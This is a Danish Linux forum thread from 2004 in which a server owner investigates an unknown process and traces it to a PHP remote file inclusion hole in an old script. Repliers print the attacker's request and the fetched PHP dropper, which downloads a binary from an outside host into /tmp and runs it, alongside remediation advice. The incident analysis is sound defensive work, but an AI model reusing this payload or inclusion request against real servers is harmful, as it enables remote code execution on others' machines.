/ Forside / Teknologi / Operativsystemer / Linux / Nyhedsindlæg
Login
Glemt dit kodeord?
Brugernavn

Kodeord


Reklame
Top 10 brugere
Linux
#NavnPoint
o.v.n. 11177
peque 7911
dk 4814
e.c 2359
Uranus 1334
emesen 1334
stone47 1307
linuxrules 1214
Octon 1100
10  BjarneD 875
proces: sh -c /tmp/dsadas;rm -f /tmp/dsad~
Fra : Kim Emax


Dato : 12-09-04 21:32

Hej

Jeg har lige dræbt en process, som jeg ikke lige genkender, der har kørt på
mit system. Wackede den samme for et par uger siden:

sh -c /tmp/dsadas;rm -f /tmp/dsadas

tjekker jeg processIDet i /proc/ vises følgende:

ls -al
total 40
dr-xr-xr-x 3 nobody nobody 4096 Sep 12 22:00 .
drwxr-x--- 7 root root 4096 Sep 12 22:05 ..
-r--r--r-- 1 nobody nobody 36 Sep 12 22:00 cmdline
lrwxrwxrwx 1 nobody nobody 1 Sep 12 22:00 cwd -> /
-r-------- 1 nobody nobody 285 Sep 12 22:00 environ
lrwxrwxrwx 1 nobody nobody 29 Sep 12 22:00 exe ->
/tmp/upxDE1Y0GDABQ5 (deleted)
dr-x------ 2 nobody nobody 4096 Sep 12 22:00 fd
-r--r--r-- 1 nobody nobody 594 Sep 12 22:00 maps
-rw------- 1 root root 0 Sep 12 22:00 mem
-r--r--r-- 1 nobody nobody 193 Sep 12 22:00 mounts
lrwxrwxrwx 1 nobody nobody 1 Sep 12 22:00 root -> /
-r--r--r-- 1 nobody nobody 196 Sep 12 22:00 stat
-r--r--r-- 1 nobody nobody 22 Sep 12 22:00 statm
-r--r--r-- 1 nobody nobody 440 Sep 12 22:00 status

fd indeholder en masse symlinks til logfilerne, 3 til /dev/null og 4 til
sockets:
lrwxrwxrwx 1 nobody nobody 9 Sep 12 22:00 0 -> /dev/null
lrwxrwxrwx 1 nobody nobody 9 Sep 12 22:00 1 -> /dev/null
lrwxrwxrwx 1 nobody nobody 15 Sep 12 22:00 3 -> socket:[308539]
lrwxrwxrwx 1 nobody nobody 15 Sep 12 22:00 4 -> socket:[165382]

Hvad pokker sker der og hvordan undgår jeg at det sker igen? Noget tyder på
at det er via apache denne process er startet, der står noget om /tmp/dsadas
i error_log og apache kører også som nobody. Jeg kører nyeste Apache 1.3.31
og Mod_ssl 2.8.19

--
Take Care
Kim Emax - master|minds - Vi tænker IT for dig...
http://www.masterminds.dk - http://www.emax.dk



 
 
Kim Emax (12-09-2004)
Kommentar
Fra : Kim Emax


Dato : 12-09-04 21:37

supplerende oplysning:

Processen kontakter: stream.jmi.or.jp.

Kim



Adam Sjøgren (12-09-2004)
Kommentar
Fra : Adam Sjøgren


Dato : 12-09-04 22:01

On Sun, 12 Sep 2004 22:32:29 +0200, Kim wrote:

> Hej Jeg har lige dræbt en process, som jeg ikke lige genkender, der
> har kørt på mit system. Wackede den samme for et par uger siden:

> sh -c /tmp/dsadas;rm -f /tmp/dsadas

Google er din ven:
<http://tweetypie.doc.ic.ac.uk/~agl02/>


Mvh.

--
"Who ees thees Kählveen?" Adam Sjøgren
asjo@koldfront.dk

Kim Emax (12-09-2004)
Kommentar
Fra : Kim Emax


Dato : 12-09-04 22:11

Adam "Sjøgren" wrote:

>> sh -c /tmp/dsadas;rm -f /tmp/dsadas
>
> Google er din ven:
> <http://tweetypie.doc.ic.ac.uk/~agl02/>

I know, og vil du være min ven , må godt fortælle, hvad du søgte på, for
jeg fandt intet, da jeg søgte på "sh -c /tmp/dsadas"

Nå, men jeg fandt det så ved at droppe sh -c i søgningen. Og fandt ud af at
jeg har et OLDgammelt script, der ikke tjekker, hvad der står i $action
inden det inkludere $action . ".inc":

GET /index.php?action=http://142.176.141.5:113/

hmmm.... Tak for hjælpen anyway! Hvad gør dette nærmere, er det
skadeligt?

--
Take Care
Kim Emax - master|minds - Vi tænker IT for dig...
http://www.masterminds.dk - http://www.emax.dk



Peter Dalgaard (12-09-2004)
Kommentar
Fra : Peter Dalgaard


Dato : 12-09-04 22:43

"Kim Emax" <newsgroup@remove-emax.dk> writes:

> GET /index.php?action=http://142.176.141.5:113/
>
> hmmm.... Tak for hjælpen anyway! Hvad gør dette nærmere, er det
> skadeligt?

Slynglen er åbenbart ikke død endnu. wget på ovenstående gav mig
(modulo linjeskift):

> more index.html
<?
passthru("killall -9 exe dsadas /tmp/dsadas");
@unlink("/tmp/dsadas");
$fd = fopen("/tmp/dsadas", "w"); if(!$fd) exit;
$xx = fopen('http://142.176.141.5/tmp', 'rb');
while($x=fread($xx, 10240)) fwrite($fd, $x); fclose($xx); fclose($fd);
chmod("/tmp/dsadas", 0700);
passthru("/tmp/dsadas;rm -f /tmp/dsadas");
?>

Så den henter tilsyneladende et arbitrært stykke kode og eksekverer
det som den bruger der kører apache. Desværre fik jeg en 404 på
http://142.176.141.5/tmp så det er ikke til at vide hvad /tmp/dsadas
indeholdt. Medmindre du selv havde åndsnærværelse til at gemme den...

--
O__ ---- Peter Dalgaard Blegdamsvej 3
c/ /'_ --- Dept. of Biostatistics 2200 Cph. N
(*) \(*) -- University of Copenhagen Denmark Ph: (+45) 35327918
~~~~~~~~~~ - (p.dalgaard@biostat.ku.dk) FAX: (+45) 35327907

Kim Emax (12-09-2004)
Kommentar
Fra : Kim Emax


Dato : 12-09-04 23:26

Peter Dalgaard wrote:

> Slynglen er åbenbart ikke død endnu. wget på ovenstående gav mig

øhhh, ikke på min server vel? Det er 142.176... du har prøvet på ik?

> (modulo linjeskift):
>
>> more index.html
> <?
> passthru("killall -9 exe dsadas /tmp/dsadas");
> @unlink("/tmp/dsadas");
> $fd = fopen("/tmp/dsadas", "w"); if(!$fd) exit;
> $xx = fopen('http://142.176.141.5/tmp', 'rb');
> while($x=fread($xx, 10240)) fwrite($fd, $x); fclose($xx); fclose($fd);
> chmod("/tmp/dsadas", 0700);
> passthru("/tmp/dsadas;rm -f /tmp/dsadas");
>>
>
> Så den henter tilsyneladende et arbitrært stykke kode og eksekverer
> det som den bruger der kører apache. Desværre fik jeg en 404 på
> http://142.176.141.5/tmp så det er ikke til at vide hvad /tmp/dsadas
> indeholdt. Medmindre du selv havde åndsnærværelse til at gemme den...

Jeg har gemt alt, hvad der lå i /proc/PID/, hvis du vil se det? Jeg kunne
også åbne for fejlen i scriptet igen og sætte et script til at tjekke
outputtet af ps aux og så kopiere /tmp/dsadas, hvis der er et match (eller
bare kigge efter og kopiere /tmp/dsadas)

--
Take Care
Kim Emax - master|minds - Vi tænker IT for dig...
http://www.masterminds.dk - http://www.emax.dk



Peter Dalgaard (13-09-2004)
Kommentar
Fra : Peter Dalgaard


Dato : 13-09-04 10:43

"Kim Emax" <newsgroup@remove-emax.dk> writes:

> Peter Dalgaard wrote:
>
> > Slynglen er åbenbart ikke død endnu. wget på ovenstående gav mig
>
> øhhh, ikke på min server vel? Det er 142.176... du har prøvet på ik?

http://142.176.141.5:113

> Jeg har gemt alt, hvad der lå i /proc/PID/, hvis du vil se det? Jeg kunne
> også åbne for fejlen i scriptet igen og sætte et script til at tjekke
> outputtet af ps aux og så kopiere /tmp/dsadas, hvis der er et match (eller
> bare kigge efter og kopiere /tmp/dsadas)

Der er sikkert større eksperter end mig i gruppen...

--
O__ ---- Peter Dalgaard Blegdamsvej 3
c/ /'_ --- Dept. of Biostatistics 2200 Cph. N
(*) \(*) -- University of Copenhagen Denmark Ph: (+45) 35327918
~~~~~~~~~~ - (p.dalgaard@biostat.ku.dk) FAX: (+45) 35327907

Povl H. Pedersen (12-09-2004)
Kommentar
Fra : Povl H. Pedersen


Dato : 12-09-04 23:08

In article <jX21d.47048$Vf.2403558@news000.worldonline.dk>, Kim Emax wrote:
> Adam "Sjøgren" wrote:
>
>>> sh -c /tmp/dsadas;rm -f /tmp/dsadas
>>
>> Google er din ven:
>> <http://tweetypie.doc.ic.ac.uk/~agl02/>
>
> I know, og vil du være min ven , må godt fortælle, hvad du søgte på, for
> jeg fandt intet, da jeg søgte på "sh -c /tmp/dsadas"

-c betyder du ikke ønsker sider hvor der står c på.

--
Povl H. Pedersen - NoSpam@my.terminal.dk (yes - it works)
Fastnet - IP telefoni: 5 kr/md Se http://www.musimi.dk

Andreas Kleist Svend~ (13-09-2004)
Kommentar
Fra : Andreas Kleist Svend~


Dato : 13-09-04 08:27

Povl H. Pedersen wrote:
> In article <jX21d.47048$Vf.2403558@news000.worldonline.dk>, Kim Emax wrote:
>
>>I know, og vil du være min ven , må godt fortælle, hvad du søgte på, for
>>jeg fandt intet, da jeg søgte på "sh -c /tmp/dsadas"
>
>
> -c betyder du ikke ønsker sider hvor der står c på.

Nej, ikke når det står i gåseøjne. Prøv f.eks. en søgning på "ls -l".

/Andreas

Dennis Jørgensen (13-09-2004)
Kommentar
Fra : Dennis Jørgensen


Dato : 13-09-04 11:01

"Kim Emax" <newsgroup@remove-emax.dk> writes:

> Nå, men jeg fandt det så ved at droppe sh -c i søgningen. Og fandt ud af at
> jeg har et OLDgammelt script, der ikke tjekker, hvad der står i $action
> inden det inkludere $action . ".inc":
>
> GET /index.php?action=http://142.176.141.5:113/
>
> hmmm.... Tak for hjælpen anyway! Hvad gør dette nærmere, er det
> skadeligt?

dnj@vetinari$ wget http://142.176.141.5:113
[blabla]
11:36:53 (2.99 MB/s) - `index.html' saved [314/314]
dnj@vetinari$ cat index.html
<? passthru("killall -9 exe dsadas /tmp/dsadas");
@unlink("/tmp/dsadas"); $fd = fopen("/tmp/dsadas", "w"); if(!$fd) exit;
$xx = fopen('http://142.176.141.5/tmp', 'rb'); while($x=fread($xx,
10240)) fwrite($fd, $x); fclose($xx); fclose($fd); chmod("/tmp/dsadas",
0700); passthru("/tmp/dsadas;rm -f /tmp/dsadas"); ?>
dnj@vetinari$


Det er altid skadeligt at lade tilfældige mennesker køre tilfældige
programmer på ens pc.

Tilsyneladende er programmet ikke længere tilgængeligt, men jeg ville
stadig sende en mail til abuse@aliant.net (såvidt jeg kan se), så kan de
sende det videre i systemet. Det er ganske givet ikke meningen at der
skal køre en webserver på port 113 på den maskine.

Du bør nok også overveje om du stadig stoler på indholdet af din egen
maskine.


Mvh.


Dennis Jørgensen

Kim Emax (13-09-2004)
Kommentar
Fra : Kim Emax


Dato : 13-09-04 23:27

"Dennis Jørgensen" wrote:

> Det er altid skadeligt at lade tilfældige mennesker køre tilfældige
> programmer på ens pc.

I hvert fald knap så smart.

> Tilsyneladende er programmet ikke længere tilgængeligt, men jeg ville
> stadig sende en mail til abuse@aliant.net (såvidt jeg kan se), så kan
> de sende det videre i systemet. Det er ganske givet ikke meningen at
> der skal køre en webserver på port 113 på den maskine.

Som jeg har skrevet andetsteds i tråden, så overvejer jeg at åbne for hullet
igen og lave et script, det holder øje med /tmp/ og skulle svinet dukke op,
så kopiere det, dræbe processen og flytte filen med hullet mv... bare for at
se, hvad det gør og hvad jeg skal kigge efter som du rigtigt nok skriver
nedenfor

> Du bør nok også overveje om du stadig stoler på indholdet af din egen
> maskine.

Jeg har lavet et shellscript, der kører chrootkit hver 3. time, skal have
kigget på snort og sat tripwire op. Andet jeg kan kaste mig over nu jeg er i
gang?

--
Take Care
Kim Emax - master|minds - Vi tænker IT for dig...
http://www.masterminds.dk - http://www.emax.dk



Peter Dalgaard (12-09-2004)
Kommentar
Fra : Peter Dalgaard


Dato : 12-09-04 22:04

"Kim Emax" <newsgroup@remove-emax.dk> writes:

> Hej
>
> Jeg har lige dræbt en process, som jeg ikke lige genkender, der har kørt på
> mit system. Wackede den samme for et par uger siden:
>
> sh -c /tmp/dsadas;rm -f /tmp/dsadas

Se om du kan finde hoved eller hale i følgende blog:

http://tweetypie.doc.ic.ac.uk/~agl02/

--
O__ ---- Peter Dalgaard Blegdamsvej 3
c/ /'_ --- Dept. of Biostatistics 2200 Cph. N
(*) \(*) -- University of Copenhagen Denmark Ph: (+45) 35327918
~~~~~~~~~~ - (p.dalgaard@biostat.ku.dk) FAX: (+45) 35327907

Adam Sjøgren (12-09-2004)
Kommentar
Fra : Adam Sjøgren


Dato : 12-09-04 22:13

On Sun, 12 Sep 2004 23:10:40 +0200, Kim wrote:

> I know, og vil du være min ven , må godt fortælle, hvad du søgte
> på, for jeg fandt intet, da jeg søgte på "sh -c /tmp/dsadas"

Jeg søgte på "/tmp/dsadas"

> hmmm.... Tak for hjælpen anyway! Hvad gør dette nærmere, er det
> skadeligt?

Ingen anelse. Er det skadeligt at din computer bliver udnyttet til
DoS-angreb? Der må svaret vist være ja.


Mvh.

--
"Who ees thees Kählveen?" Adam Sjøgren
asjo@koldfront.dk

Alex Holst (14-09-2004)
Kommentar
Fra : Alex Holst


Dato : 14-09-04 00:07

Kim Emax wrote:
> Jeg har lige dræbt en process, som jeg ikke lige genkender, der har kørt på
> mit system. Wackede den samme for et par uger siden:
>
> sh -c /tmp/dsadas;rm -f /tmp/dsadas

   http://sikkerhed-faq.dk/servere#indbrud


--
I prefer the dark of the night, after midnight and before four-thirty,
when it's more bare, more hollow. http://a.mongers.org

OSS/FAQ for dk.edb.sikkerhed: http://sikkerhed-faq.dk

Søg
Reklame
Statistik
Spørgsmål : 177552
Tips : 31968
Nyheder : 719565
Indlæg : 6408849
Brugere : 218887

Månedens bedste
Årets bedste
Sidste års bedste